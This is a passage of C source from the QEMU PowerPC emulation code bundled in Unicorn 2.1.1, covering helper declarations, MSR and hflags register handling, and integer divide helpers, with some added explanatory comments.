vsr, vsr, vsr, vsr) DEF_HELPER_4(xvmaxdp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvmindp, void, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpeqdp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpgedp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpgtdp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpnedp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_3(xvcvdpsp, void, env, vsr, vsr) DEF_HELPER_3(xvcvdpsxds, void, env, vsr, vsr) DEF_HELPER_3(xvcvdpsxws, void, env, vsr, vsr) DEF_HELPER_3(xvcvdpuxds, void, env, vsr, vsr) DEF_HELPER_3(xvcvdpuxws, void, env, vsr, vsr) DEF_HELPER_3(xvcvsxddp, void, env, vsr, vsr) DEF_HELPER_3(xvcvuxddp, void, env, vsr, vsr) DEF_HELPER_3(xvcvsxwdp, void, env, vsr, vsr) DEF_HELPER_3(xvcvuxwdp, void, env, vsr, vsr) DEF_HELPER_3(xvrdpi, void, env, vsr, vsr) DEF_HELPER_3(xvrdpic, void, env, vsr, vsr) DEF_HELPER_3(xvrdpim, void, env, vsr, vsr) DEF_HELPER_3(xvrdpip, void, env, 
vsr, vsr) DEF_HELPER_3(xvrdpiz, void, env, vsr, vsr) DEF_HELPER_4(xvaddsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvsubsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvmulsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvdivsp, void, env, vsr, vsr, vsr) DEF_HELPER_3(xvresp, void, env, vsr, vsr) DEF_HELPER_3(xvsqrtsp, void, env, vsr, vsr) DEF_HELPER_3(xvrsqrtesp, void, env, vsr, vsr) DEF_HELPER_4(xvtdivsp, void, env, i32, vsr, vsr) DEF_HELPER_3(xvtsqrtsp, void, env, i32, vsr) DEF_HELPER_5(xvmaddsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xvmsubsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xvnmaddsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xvnmsubsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_4(xvmaxsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvminsp, void, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpeqsp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpgesp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpgtsp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_FLAGS_4(xvcmpnesp, TCG_CALL_NO_RWG, i32, env, vsr, vsr, vsr) DEF_HELPER_3(xvcvspdp, void, env, vsr, vsr) DEF_HELPER_3(xvcvsphp, void, env, vsr, vsr) DEF_HELPER_3(xvcvhpsp, void, env, vsr, vsr) DEF_HELPER_3(xvcvspsxds, void, env, vsr, vsr) DEF_HELPER_3(xvcvspsxws, void, env, vsr, vsr) DEF_HELPER_3(xvcvspuxds, void, env, vsr, vsr) DEF_HELPER_3(xvcvspuxws, void, env, vsr, vsr) DEF_HELPER_3(xvcvsxdsp, void, env, vsr, vsr) DEF_HELPER_3(xvcvuxdsp, void, env, vsr, vsr) DEF_HELPER_3(xvcvsxwsp, void, env, vsr, vsr) DEF_HELPER_3(xvcvuxwsp, void, env, vsr, vsr) DEF_HELPER_2(xvtstdcsp, void, env, i32) DEF_HELPER_2(xvtstdcdp, void, env, i32) DEF_HELPER_3(xvrspi, void, env, vsr, vsr) DEF_HELPER_3(xvrspic, void, env, vsr, vsr) DEF_HELPER_3(xvrspim, void, env, vsr, vsr) DEF_HELPER_3(xvrspip, void, env, vsr, vsr) DEF_HELPER_3(xvrspiz, void, env, vsr, vsr) DEF_HELPER_4(xxperm, void, env, vsr, vsr, vsr) DEF_HELPER_4(xxpermr, void, env, vsr, vsr, vsr) DEF_HELPER_4(xxextractuw, void, env, vsr, vsr, i32) DEF_HELPER_4(xxinsertw, void, env, vsr, vsr, i32) DEF_HELPER_3(xvxsigsp, void, env, vsr, vsr) DEF_HELPER_2(efscfsi, i32, env, i32) DEF_HELPER_2(efscfui, i32, env, i32) DEF_HELPER_2(efscfuf, i32, env, i32) DEF_HELPER_2(efscfsf, i32, env, i32) DEF_HELPER_2(efsctsi, i32, env, i32) DEF_HELPER_2(efsctui, i32, env, i32) DEF_HELPER_2(efsctsiz, i32, env, i32) DEF_HELPER_2(efsctuiz, i32, env, i32) DEF_HELPER_2(efsctsf, i32, env, i32) DEF_HELPER_2(efsctuf, i32, env, i32) DEF_HELPER_2(evfscfsi, i64, env, i64) DEF_HELPER_2(evfscfui, i64, env, i64) DEF_HELPER_2(evfscfuf, i64, env, i64) DEF_HELPER_2(evfscfsf, i64, env, i64) DEF_HELPER_2(evfsctsi, i64, env, i64) DEF_HELPER_2(evfsctui, i64, env, i64) DEF_HELPER_2(evfsctsiz, i64, env, i64) DEF_HELPER_2(evfsctuiz, i64, env, i64) DEF_HELPER_2(evfsctsf, i64, env, i64) DEF_HELPER_2(evfsctuf, i64, env, i64) DEF_HELPER_3(efsadd, i32, env, i32, i32) DEF_HELPER_3(efssub, i32, env, i32, i32) DEF_HELPER_3(efsmul, i32, env, i32, i32) DEF_HELPER_3(efsdiv, i32, env, i32, i32) DEF_HELPER_3(evfsadd, i64, env, i64, i64) DEF_HELPER_3(evfssub, i64, env, i64, i64) DEF_HELPER_3(evfsmul, i64, env, i64, i64) DEF_HELPER_3(evfsdiv, i64, env, i64, i64) DEF_HELPER_3(efststlt, i32, env, i32, i32) DEF_HELPER_3(efststgt, i32, env, i32, i32) DEF_HELPER_3(efststeq, i32, env, i32, i32) DEF_HELPER_3(efscmplt, i32, env, i32, i32) DEF_HELPER_3(efscmpgt, i32, env, i32, i32) DEF_HELPER_3(efscmpeq, i32, env, i32, i32) DEF_HELPER_3(evfststlt, i32, env, i64, i64) DEF_HELPER_3(evfststgt, i32, env, i64, i64) 
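/*
 * Editor's note (added commentary, not in the original header): the SPE
 * vector-float helpers (the evfs entries in this block) pass both 32-bit
 * float lanes packed into a single i64 argument and return the two
 * results repacked the same way.  A hedged sketch of the lane handling,
 * with hypothetical res_hi/res_lo names:
 *
 *     uint32_t hi = (uint32_t)(val >> 32);      upper lane
 *     uint32_t lo = (uint32_t)val;              lower lane
 *     ... operate on each lane independently ...
 *     return ((uint64_t)res_hi << 32) | res_lo;
 */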
DEF_HELPER_3(evfststeq, i32, env, i64, i64) DEF_HELPER_3(evfscmplt, i32, env, i64, i64) DEF_HELPER_3(evfscmpgt, i32, env, i64, i64) DEF_HELPER_3(evfscmpeq, i32, env, i64, i64) DEF_HELPER_2(efdcfsi, i64, env, i32) DEF_HELPER_2(efdcfsid, i64, env, i64) DEF_HELPER_2(efdcfui, i64, env, i32) DEF_HELPER_2(efdcfuid, i64, env, i64) DEF_HELPER_2(efdctsi, i32, env, i64) DEF_HELPER_2(efdctui, i32, env, i64) DEF_HELPER_2(efdctsiz, i32, env, i64) DEF_HELPER_2(efdctsidz, i64, env, i64) DEF_HELPER_2(efdctuiz, i32, env, i64) DEF_HELPER_2(efdctuidz, i64, env, i64) DEF_HELPER_2(efdcfsf, i64, env, i32) DEF_HELPER_2(efdcfuf, i64, env, i32) DEF_HELPER_2(efdctsf, i32, env, i64) DEF_HELPER_2(efdctuf, i32, env, i64) DEF_HELPER_2(efscfd, i32, env, i64) DEF_HELPER_2(efdcfs, i64, env, i32) DEF_HELPER_3(efdadd, i64, env, i64, i64) DEF_HELPER_3(efdsub, i64, env, i64, i64) DEF_HELPER_3(efdmul, i64, env, i64, i64) DEF_HELPER_3(efddiv, i64, env, i64, i64) DEF_HELPER_3(efdtstlt, i32, env, i64, i64) DEF_HELPER_3(efdtstgt, i32, env, i64, i64) DEF_HELPER_3(efdtsteq, i32, env, i64, i64) DEF_HELPER_3(efdcmplt, i32, env, i64, i64) DEF_HELPER_3(efdcmpgt, i32, env, i64, i64) DEF_HELPER_3(efdcmpeq, i32, env, i64, i64) DEF_HELPER_2(4xx_tlbre_hi, tl, env, tl) DEF_HELPER_2(4xx_tlbre_lo, tl, env, tl) DEF_HELPER_3(4xx_tlbwe_hi, void, env, tl, tl) DEF_HELPER_3(4xx_tlbwe_lo, void, env, tl, tl) DEF_HELPER_2(4xx_tlbsx, tl, env, tl) DEF_HELPER_3(440_tlbre, tl, env, i32, tl) DEF_HELPER_4(440_tlbwe, void, env, i32, tl, tl) DEF_HELPER_2(440_tlbsx, tl, env, tl) DEF_HELPER_1(booke206_tlbre, void, env) DEF_HELPER_1(booke206_tlbwe, void, env) DEF_HELPER_2(booke206_tlbsx, void, env, tl) DEF_HELPER_2(booke206_tlbivax, void, env, tl) DEF_HELPER_2(booke206_tlbilx0, void, env, tl) DEF_HELPER_2(booke206_tlbilx1, void, env, tl) DEF_HELPER_2(booke206_tlbilx3, void, env, tl) DEF_HELPER_2(booke206_tlbflush, void, env, tl) DEF_HELPER_3(booke_setpid, void, env, i32, tl) DEF_HELPER_2(booke_set_eplc, void, env, tl) DEF_HELPER_2(booke_set_epsc, void, env, tl) DEF_HELPER_2(6xx_tlbd, void, env, tl) DEF_HELPER_2(6xx_tlbi, void, env, tl) DEF_HELPER_2(74xx_tlbd, void, env, tl) DEF_HELPER_2(74xx_tlbi, void, env, tl) DEF_HELPER_FLAGS_1(tlbia, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_2(tlbie, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(tlbiva, TCG_CALL_NO_RWG, void, env, tl) #if defined(TARGET_PPC64) DEF_HELPER_FLAGS_3(store_slb, TCG_CALL_NO_RWG, void, env, tl, tl) DEF_HELPER_2(load_slb_esid, tl, env, tl) DEF_HELPER_2(load_slb_vsid, tl, env, tl) DEF_HELPER_2(find_slb_vsid, tl, env, tl) DEF_HELPER_FLAGS_2(slbia, TCG_CALL_NO_RWG, void, env, i32) DEF_HELPER_FLAGS_2(slbie, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(slbieg, TCG_CALL_NO_RWG, void, env, tl) #endif DEF_HELPER_FLAGS_2(load_sr, TCG_CALL_NO_RWG, tl, env, tl) DEF_HELPER_FLAGS_3(store_sr, TCG_CALL_NO_RWG, void, env, tl, tl) DEF_HELPER_FLAGS_1(602_mfrom, TCG_CALL_NO_RWG_SE, tl, tl) DEF_HELPER_2(msgsnd, void, env, tl) DEF_HELPER_2(msgclr, void, env, tl) DEF_HELPER_2(book3s_msgsnd, void, env, tl) DEF_HELPER_2(book3s_msgclr, void, env, tl) DEF_HELPER_4(dlmzb, tl, env, tl, tl, i32) DEF_HELPER_FLAGS_2(clcs, TCG_CALL_NO_RWG_SE, tl, env, i32) DEF_HELPER_2(rac, tl, env, tl) DEF_HELPER_3(div, tl, env, tl, tl) DEF_HELPER_3(divo, tl, env, tl, tl) DEF_HELPER_3(divs, tl, env, tl, tl) DEF_HELPER_3(divso, tl, env, tl, tl) DEF_HELPER_2(load_dcr, tl, env, tl) DEF_HELPER_3(store_dcr, void, env, tl, tl) DEF_HELPER_2(load_dump_spr, void, env, i32) DEF_HELPER_2(store_dump_spr, void, env, i32) 
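/*
 * Editor's note (added commentary, not in the original header): the 601
 * POWER-bridge divide helpers declared above (div, divo, divs, divso)
 * work through the MQ special register: div and divo divide the 64-bit
 * concatenation of RA and MQ by RB, divs and divso divide RA directly,
 * and all four leave the remainder in MQ.  In outline, straight from
 * the int_helper.c implementation (overflow and INT32_MIN special
 * cases omitted):
 *
 *     uint64_t tmp = (uint64_t)arg1 << 32 | env->spr[SPR_MQ];
 *     env->spr[SPR_MQ] = tmp % arg2;
 *     return tmp / (int32_t)arg2;
 */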
DEF_HELPER_4(fscr_facility_check, void, env, i32, i32, i32) DEF_HELPER_4(msr_facility_check, void, env, i32, i32, i32) DEF_HELPER_FLAGS_1(load_tbl, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_1(load_tbu, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_1(load_atbl, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_1(load_atbu, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_1(load_vtb, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_1(load_601_rtcl, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_1(load_601_rtcu, TCG_CALL_NO_RWG, tl, env) #if defined(TARGET_PPC64) DEF_HELPER_FLAGS_1(load_purr, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_2(store_purr, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_2(store_ptcr, void, env, tl) DEF_HELPER_FLAGS_1(load_dpdes, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_2(store_dpdes, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_2(book3s_msgsndp, void, env, tl) DEF_HELPER_2(book3s_msgclrp, void, env, tl) #endif DEF_HELPER_2(store_sdr1, void, env, tl) DEF_HELPER_2(store_pidr, void, env, tl) DEF_HELPER_2(store_lpidr, void, env, tl) DEF_HELPER_FLAGS_2(store_tbl, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_tbu, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_atbl, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_atbu, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_601_rtcl, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_601_rtcu, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_1(load_decr, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_2(store_decr, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_1(load_hdecr, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_2(store_hdecr, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_vtb, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_tbu40, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_2(store_hid0_601, void, env, tl) DEF_HELPER_3(store_403_pbr, void, env, i32, tl) DEF_HELPER_FLAGS_1(load_40x_pit, TCG_CALL_NO_RWG, tl, env) DEF_HELPER_FLAGS_2(store_40x_pit, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_2(store_40x_dbcr0, void, env, tl) DEF_HELPER_2(store_40x_sler, void, env, tl) DEF_HELPER_FLAGS_2(store_booke_tcr, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_FLAGS_2(store_booke_tsr, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_3(store_ibatl, void, env, i32, tl) DEF_HELPER_3(store_ibatu, void, env, i32, tl) DEF_HELPER_3(store_dbatl, void, env, i32, tl) DEF_HELPER_3(store_dbatu, void, env, i32, tl) DEF_HELPER_3(store_601_batl, void, env, i32, tl) DEF_HELPER_3(store_601_batu, void, env, i32, tl) #define dh_alias_fprp ptr #define dh_ctype_fprp ppc_fprp_t * #define dh_is_signed_fprp dh_is_signed_ptr DEF_HELPER_4(dadd, void, env, fprp, fprp, fprp) DEF_HELPER_4(daddq, void, env, fprp, fprp, fprp) DEF_HELPER_4(dsub, void, env, fprp, fprp, fprp) DEF_HELPER_4(dsubq, void, env, fprp, fprp, fprp) DEF_HELPER_4(dmul, void, env, fprp, fprp, fprp) DEF_HELPER_4(dmulq, void, env, fprp, fprp, fprp) DEF_HELPER_4(ddiv, void, env, fprp, fprp, fprp) DEF_HELPER_4(ddivq, void, env, fprp, fprp, fprp) DEF_HELPER_3(dcmpo, i32, env, fprp, fprp) DEF_HELPER_3(dcmpoq, i32, env, fprp, fprp) DEF_HELPER_3(dcmpu, i32, env, fprp, fprp) DEF_HELPER_3(dcmpuq, i32, env, fprp, fprp) DEF_HELPER_3(dtstdc, i32, env, fprp, i32) DEF_HELPER_3(dtstdcq, i32, env, fprp, i32) DEF_HELPER_3(dtstdg, i32, env, fprp, i32) DEF_HELPER_3(dtstdgq, i32, env, fprp, i32) DEF_HELPER_3(dtstex, i32, env, fprp, fprp) DEF_HELPER_3(dtstexq, i32, env, fprp, fprp) DEF_HELPER_3(dtstsf, i32, env, fprp, fprp) DEF_HELPER_3(dtstsfq, i32, env, fprp, fprp) DEF_HELPER_3(dtstsfi, i32, env, i32, 
fprp)
DEF_HELPER_3(dtstsfiq, i32, env, i32, fprp)
DEF_HELPER_5(dquai, void, env, fprp, fprp, i32, i32)
DEF_HELPER_5(dquaiq, void, env, fprp, fprp, i32, i32)
DEF_HELPER_5(dqua, void, env, fprp, fprp, fprp, i32)
DEF_HELPER_5(dquaq, void, env, fprp, fprp, fprp, i32)
DEF_HELPER_5(drrnd, void, env, fprp, fprp, fprp, i32)
DEF_HELPER_5(drrndq, void, env, fprp, fprp, fprp, i32)
DEF_HELPER_5(drintx, void, env, fprp, fprp, i32, i32)
DEF_HELPER_5(drintxq, void, env, fprp, fprp, i32, i32)
DEF_HELPER_5(drintn, void, env, fprp, fprp, i32, i32)
DEF_HELPER_5(drintnq, void, env, fprp, fprp, i32, i32)
DEF_HELPER_3(dctdp, void, env, fprp, fprp)
DEF_HELPER_3(dctqpq, void, env, fprp, fprp)
DEF_HELPER_3(drsp, void, env, fprp, fprp)
DEF_HELPER_3(drdpq, void, env, fprp, fprp)
DEF_HELPER_3(dcffix, void, env, fprp, fprp)
DEF_HELPER_3(dcffixq, void, env, fprp, fprp)
DEF_HELPER_3(dctfix, void, env, fprp, fprp)
DEF_HELPER_3(dctfixq, void, env, fprp, fprp)
DEF_HELPER_4(ddedpd, void, env, fprp, fprp, i32)
DEF_HELPER_4(ddedpdq, void, env, fprp, fprp, i32)
DEF_HELPER_4(denbcd, void, env, fprp, fprp, i32)
DEF_HELPER_4(denbcdq, void, env, fprp, fprp, i32)
DEF_HELPER_3(dxex, void, env, fprp, fprp)
DEF_HELPER_3(dxexq, void, env, fprp, fprp)
DEF_HELPER_4(diex, void, env, fprp, fprp, fprp)
DEF_HELPER_4(diexq, void, env, fprp, fprp, fprp)
DEF_HELPER_4(dscri, void, env, fprp, fprp, i32)
DEF_HELPER_4(dscriq, void, env, fprp, fprp, i32)
DEF_HELPER_4(dscli, void, env, fprp, fprp, i32)
DEF_HELPER_4(dscliq, void, env, fprp, fprp, i32)
DEF_HELPER_1(tbegin, void, env)
DEF_HELPER_FLAGS_1(fixup_thrm, TCG_CALL_NO_RWG, void, env)
#ifdef TARGET_PPC64
DEF_HELPER_FLAGS_3(lq_le_parallel, TCG_CALL_NO_WG, i64, env, tl, i32)
DEF_HELPER_FLAGS_3(lq_be_parallel, TCG_CALL_NO_WG, i64, env, tl, i32)
DEF_HELPER_FLAGS_5(stq_le_parallel, TCG_CALL_NO_WG, void, env, tl, i64, i64, i32)
DEF_HELPER_FLAGS_5(stq_be_parallel, TCG_CALL_NO_WG, void, env, tl, i64, i64, i32)
DEF_HELPER_5(stqcx_le_parallel, i32, env, tl, i64, i64, i32)
DEF_HELPER_5(stqcx_be_parallel, i32, env, tl, i64, i64, i32)
#endif
unicorn-2.1.1/qemu/target/ppc/helper_regs.h000066400000000000000000000133461467524106700207020ustar00rootroot00000000000000/*
 * PowerPC emulation special registers manipulation helpers for qemu.
 *
 * Copyright (c) 2003-2007 Jocelyn Mayer
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#ifndef HELPER_REGS_H
#define HELPER_REGS_H

#include "exec/exec-all.h"

/* Swap temporary saved registers with GPRs */
static inline void hreg_swap_gpr_tgpr(CPUPPCState *env)
{
    target_ulong tmp;

    tmp = env->gpr[0];
    env->gpr[0] = env->tgpr[0];
    env->tgpr[0] = tmp;
    tmp = env->gpr[1];
    env->gpr[1] = env->tgpr[1];
    env->tgpr[1] = tmp;
    tmp = env->gpr[2];
    env->gpr[2] = env->tgpr[2];
    env->tgpr[2] = tmp;
    tmp = env->gpr[3];
    env->gpr[3] = env->tgpr[3];
    env->tgpr[3] = tmp;
}

static inline void hreg_compute_mem_idx(CPUPPCState *env)
{
    /*
     * This is our encoding for server processors. The architecture
     * specifies that there is no such thing as userspace with
     * translation off, however it appears that MacOS does it and some
     * 32-bit CPUs support it. Weird...
     *
     *   0 = Guest User space virtual mode
     *   1 = Guest Kernel space virtual mode
     *   2 = Guest User space real mode
     *   3 = Guest Kernel space real mode
     *   4 = HV User space virtual mode
     *   5 = HV Kernel space virtual mode
     *   6 = HV User space real mode
     *   7 = HV Kernel space real mode
     *
     * For BookE, we need 8 MMU modes as follows:
     *
     *   0 = AS 0 HV User space
     *   1 = AS 0 HV Kernel space
     *   2 = AS 1 HV User space
     *   3 = AS 1 HV Kernel space
     *   4 = AS 0 Guest User space
     *   5 = AS 0 Guest Kernel space
     *   6 = AS 1 Guest User space
     *   7 = AS 1 Guest Kernel space
     */
    if (env->mmu_model & POWERPC_MMU_BOOKE) {
        env->immu_idx = env->dmmu_idx = msr_pr ? 0 : 1;
        env->immu_idx += msr_is ? 2 : 0;
        env->dmmu_idx += msr_ds ? 2 : 0;
        env->immu_idx += msr_gs ? 4 : 0;
        env->dmmu_idx += msr_gs ? 4 : 0;
    } else {
        env->immu_idx = env->dmmu_idx = msr_pr ? 0 : 1;
        env->immu_idx += msr_ir ? 0 : 2;
        env->dmmu_idx += msr_dr ? 0 : 2;
        env->immu_idx += msr_hv ? 4 : 0;
        env->dmmu_idx += msr_hv ? 4 : 0;
    }
}

static inline void hreg_compute_hflags(CPUPPCState *env)
{
    target_ulong hflags_mask;

    /* We 'forget' FE0 & FE1: we'll never generate imprecise exceptions */
    hflags_mask = (1 << MSR_VR) | (1 << MSR_AP) | (1 << MSR_SA) |
        (1 << MSR_PR) | (1 << MSR_FP) | (1 << MSR_SE) | (1 << MSR_BE) |
        (1 << MSR_LE) | (1 << MSR_VSX) | (1 << MSR_IR) | (1 << MSR_DR);
    hflags_mask |= (1ULL << MSR_CM) | (1ULL << MSR_SF) | MSR_HVB;
    hreg_compute_mem_idx(env);
    env->hflags = env->msr & hflags_mask;
    /* Merge with hflags coming from other registers */
    env->hflags |= env->hflags_nmsr;
}

static inline void cpu_interrupt_exittb(CPUState *cs)
{
    cpu_interrupt(cs, CPU_INTERRUPT_EXITTB);
}

static inline int hreg_store_msr(CPUPPCState *env, target_ulong value,
                                 int alter_hv)
{
    int excp;
    CPUState *cs = env_cpu(env);

    excp = 0;
    value &= env->msr_mask;
    /* Neither mtmsr nor guest state can alter HV */
    if (!alter_hv || !(env->msr & MSR_HVB)) {
        value &= ~MSR_HVB;
        value |= env->msr & MSR_HVB;
    }
    if (((value >> MSR_IR) & 1) != msr_ir ||
        ((value >> MSR_DR) & 1) != msr_dr) {
        cpu_interrupt_exittb(cs);
    }
    if ((env->mmu_model & POWERPC_MMU_BOOKE) &&
        ((value >> MSR_GS) & 1) != msr_gs) {
        cpu_interrupt_exittb(cs);
    }
    if (unlikely((env->flags & POWERPC_FLAG_TGPR) &&
                 ((value ^ env->msr) & (1 << MSR_TGPR)))) {
        /* Swap temporary saved registers with GPRs */
        hreg_swap_gpr_tgpr(env);
    }
    if (unlikely(((value >> MSR_EP) & 1) != msr_ep)) {
        /* Change the exception prefix on PowerPC 601 */
        env->excp_prefix = ((value >> MSR_EP) & 1) * 0xFFF00000;
    }
    /*
     * If PR=1 then EE, IR and DR must be 1
     *
     * Note: We only enforce this on 64-bit server processors.
     * It appears that:
     * - 32-bit implementations support PR=1 and EE/DR/IR=0 and MacOS
     *   exploits it.
     * - 64-bit embedded implementations do not need any operation to be
     *   performed when PR is set.
     */
    if (is_book3s_arch2x(env) && ((value >> MSR_PR) & 1)) {
        value |= (1 << MSR_EE) | (1 << MSR_DR) | (1 << MSR_IR);
    }

    env->msr = value;
    hreg_compute_hflags(env);

    if (unlikely(msr_pow == 1)) {
        if (!env->pending_interrupts && (*env->check_pow)(env)) {
            cs->halted = 1;
            excp = EXCP_HALTED;
        }
    }

    return excp;
}

static inline void check_tlb_flush(CPUPPCState *env, bool global)
{
    CPUState *cs = env_cpu(env);

    /* Handle global flushes first */
    if (global && (env->tlb_need_flush & TLB_NEED_GLOBAL_FLUSH)) {
        env->tlb_need_flush &= ~TLB_NEED_GLOBAL_FLUSH;
        env->tlb_need_flush &= ~TLB_NEED_LOCAL_FLUSH;
        tlb_flush_all_cpus_synced(cs);
        return;
    }

    /* Then handle local ones */
    if (env->tlb_need_flush & TLB_NEED_LOCAL_FLUSH) {
        env->tlb_need_flush &= ~TLB_NEED_LOCAL_FLUSH;
        tlb_flush(cs);
    }
}
#endif /* HELPER_REGS_H */
unicorn-2.1.1/qemu/target/ppc/int_helper.c000066400000000000000000002623621467524106700205300ustar00rootroot00000000000000/*
 * PowerPC integer and vector emulation helpers for QEMU.
 *
 * Copyright (c) 2003-2007 Jocelyn Mayer
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "crypto/aes.h" #include "fpu/softfloat.h" #include "qemu/guest-random.h" #include "helper_regs.h" /*****************************************************************************/ /* Fixed point operations helpers */ static inline void helper_update_ov_legacy(CPUPPCState *env, int ov) { if (unlikely(ov)) { env->so = env->ov = 1; } else { env->ov = 0; } } target_ulong helper_divweu(CPUPPCState *env, target_ulong ra, target_ulong rb, uint32_t oe) { uint64_t rt = 0; int overflow = 0; uint64_t dividend = (uint64_t)ra << 32; uint64_t divisor = (uint32_t)rb; if (unlikely(divisor == 0)) { overflow = 1; } else { rt = dividend / divisor; overflow = rt > UINT32_MAX; } if (unlikely(overflow)) { rt = 0; /* Undefined */ } if (oe) { helper_update_ov_legacy(env, overflow); } return (target_ulong)rt; } target_ulong helper_divwe(CPUPPCState *env, target_ulong ra, target_ulong rb, uint32_t oe) { int64_t rt = 0; int overflow = 0; int64_t dividend = (int64_t)ra << 32; int64_t divisor = (int64_t)((int32_t)rb); #ifdef _MSC_VER if (unlikely((divisor == 0) || ((divisor == (0ULL - 1ULL)) && (dividend == INT64_MIN)))) { #else if (unlikely((divisor == 0) || ((divisor == -1ull) && (dividend == INT64_MIN)))) { #endif overflow = 1; } else { rt = dividend / divisor; overflow = rt != (int32_t)rt; } if (unlikely(overflow)) { rt = 0; /* Undefined */ } if (oe) { helper_update_ov_legacy(env, overflow); } return (target_ulong)rt; } #if defined(TARGET_PPC64) uint64_t helper_divdeu(CPUPPCState *env, uint64_t ra, uint64_t rb, uint32_t oe) { uint64_t rt = 0; int overflow = 0; overflow = divu128(&rt, &ra, rb); if (unlikely(overflow)) { rt = 0; /* Undefined */ } if (oe) { helper_update_ov_legacy(env, overflow); } return rt; } uint64_t helper_divde(CPUPPCState *env, uint64_t rau, uint64_t rbu, uint32_t oe) { int64_t rt = 0; int64_t ra = (int64_t)rau; int64_t rb = (int64_t)rbu; int overflow = divs128(&rt, &ra, rb); if (unlikely(overflow)) { rt = 0; /* Undefined */ } if (oe) { helper_update_ov_legacy(env, overflow); } return rt; } #endif #if defined(TARGET_PPC64) /* if x = 0xab, returns 0xababababababababa */ #define pattern(x) (((x) & 0xff) * (~(target_ulong)0 / 0xff)) /* * subtract 1 from each byte, and with inverse, check if MSB is set at each * byte. * i.e. ((0x00 - 0x01) & ~(0x00)) & 0x80 * (0xFF & 0xFF) & 0x80 = 0x80 (zero found) */ #define haszero(v) (((v) - pattern(0x01)) & ~(v) & pattern(0x80)) /* When you XOR the pattern and there is a match, that byte will be zero */ #define hasvalue(x, n) (haszero((x) ^ pattern(n))) uint32_t helper_cmpeqb(target_ulong ra, target_ulong rb) { return hasvalue(rb, ra) ? CRF_GT : 0; } #undef pattern #undef haszero #undef hasvalue /* * Return a random number. 
